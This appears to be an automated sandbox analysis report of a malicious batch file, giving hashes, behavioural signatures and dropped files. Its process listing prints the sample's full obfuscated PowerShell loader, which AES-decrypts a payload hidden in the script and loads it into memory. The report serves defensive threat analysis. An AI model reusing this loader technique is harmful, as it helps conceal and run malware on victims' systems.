Analysis
max time kernel: 31s
max time network: 34s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 01-02-2023 23:07
Static task: static1
Behavioral task: behavioral1 (Sample: test.bat, Resource: win10-20220901-en)
Behavioral task: behavioral2 (Sample: test.bat, Resource: win7-20221111-en)
General
Target: test.bat
Size: 48KB
MD5: 106c27af68b78b8670267a5eebfc8040
SHA1: a2bbfb23b51cb1f2bb213dfe410601bc7fa53875
SHA256: 037565e9535d9521ad3ab3cfef0e6e91cad24b8e1cab83af7949dae67d95fb5c
SHA512: 7de6b4f739f209c11cadee9360d5cb799b77bc5d4083b706a4d9bc21f501bb45e218715dbca6cd61811458b0efd190dba06dc04141650a48d91a305abf8e4600
SSDEEP: 768:0oEB9ZEYgBM1D1gozT1RjnAKRc1pU9/gnEiCsfhh8pRA9buJsgsSxQ:jErqY7coz0JagnEtqh8pYbFgsSxQ
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  Process: test.bat.exe (PID 1784)
- Loads dropped DLL (1 IoC)
  Process: cmd.exe (PID 1432)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Process: test.bat.exe (PID 1784)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Process: test.bat.exe (PID 1784), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (3 IoCs)
  Process: cmd.exe (PID 1432) wrote to memory of test.bat.exe (PID 1784); three identical entries
Processes
1. C:\Windows\system32\cmd.exe
   Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
   - Loads dropped DLL
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Local\Temp\test.bat.exe (child of 1)
      Command line: "test.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $IDBqQ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test.bat').Split([Environment]::NewLine);foreach ($tScli in $IDBqQ) { if ($tScli.StartsWith(':: ')) { $NZVFu = $tScli.Substring(3); break; }; };$UPeLj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NZVFu);$OYivd = New-Object System.Security.Cryptography.AesManaged;$OYivd.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OYivd.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OYivd.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9jIvbQQrMXVTkWeSQpp2Gn0UtOPOB2NCbMxKhJ10/nw=');$OYivd.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('krrHd9BxMDg+kQ5ve/eVnA==');$mtmak = $OYivd.CreateDecryptor();$UPeLj = $mtmak.TransformFinalBlock($UPeLj, 0, $UPeLj.Length);$mtmak.Dispose();$OYivd.Dispose();$Tiyba = New-Object System.IO.MemoryStream(, $UPeLj);$sbkvz = New-Object System.IO.MemoryStream;$CwlxS = New-Object System.IO.Compression.GZipStream($Tiyba, [IO.Compression.CompressionMode]::Decompress);$CwlxS.CopyTo($sbkvz);$CwlxS.Dispose();$Tiyba.Dispose();$sbkvz.Dispose();$UPeLj = $sbkvz.ToArray();$nxXvq = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($UPeLj);$ZqEhy = $nxXvq.EntryPoint;$ZqEhy.Invoke($null, (, [string[]] ('')))
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\test.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- \Users\Admin\AppData\Local\Temp\test.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- memory/1784-55-0x0000000000000000-mapping.dmp
- memory/1784-57-0x000007FEFC311000-0x000007FEFC313000-memory.dmp
  Filesize: 8KB
- memory/1784-58-0x000007FEF3A50000-0x000007FEF4473000-memory.dmp
  Filesize: 10.1MB
- memory/1784-60-0x0000000002384000-0x0000000002387000-memory.dmp
  Filesize: 12KB
- memory/1784-59-0x000007FEF2EF0000-0x000007FEF3A4D000-memory.dmp
  Filesize: 11.4MB
- memory/1784-61-0x0000000002384000-0x0000000002387000-memory.dmp
  Filesize: 12KB
- memory/1784-62-0x000000000238B000-0x00000000023AA000-memory.dmp
  Filesize: 124KB